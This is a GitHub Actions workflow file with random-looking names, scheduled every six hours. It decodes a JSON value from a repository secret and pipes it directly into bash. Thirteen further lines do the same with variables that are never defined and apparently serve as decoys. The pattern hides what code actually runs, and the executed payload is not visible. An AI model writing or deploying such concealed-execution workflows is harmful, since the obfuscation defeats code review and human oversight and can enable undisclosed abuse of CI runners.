name: jialijuanzou

on:
  workflow_dispatch:
  schedule:
    - cron: '23 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jialijuanzou
        env:
          tpx8659: ${{ secrets.tpx8659 }}
        run: |
          echo $tpx8659 | jq -r .vkot69 | /bin/bash
          echo $c4 | jq -r .ea4 | /bin/bash
          echo $unoi0 | jq -r .wax2935 | /bin/bash
          echo $jbaf560 | jq -r .rq305 | /bin/bash
          echo $cx03639 | jq -r .hc1 | /bin/bash
          echo $cyrx3 | jq -r .yb22909 | /bin/bash
          echo $k79093 | jq -r .i5 | /bin/bash
          echo $jqh146 | jq -r .sjfcr728 | /bin/bash
          echo $jsc61 | jq -r .h5698 | /bin/bash
          echo $gvhkk3674 | jq -r .ot206 | /bin/bash
          echo $xzh4241 | jq -r .olhgg50795 | /bin/bash
          echo $raw9 | jq -r .cf3800 | /bin/bash
          echo $ooxcv987 | jq -r .pfe3 | /bin/bash
          echo $t4302 | jq -r .ehial352 | /bin/bash

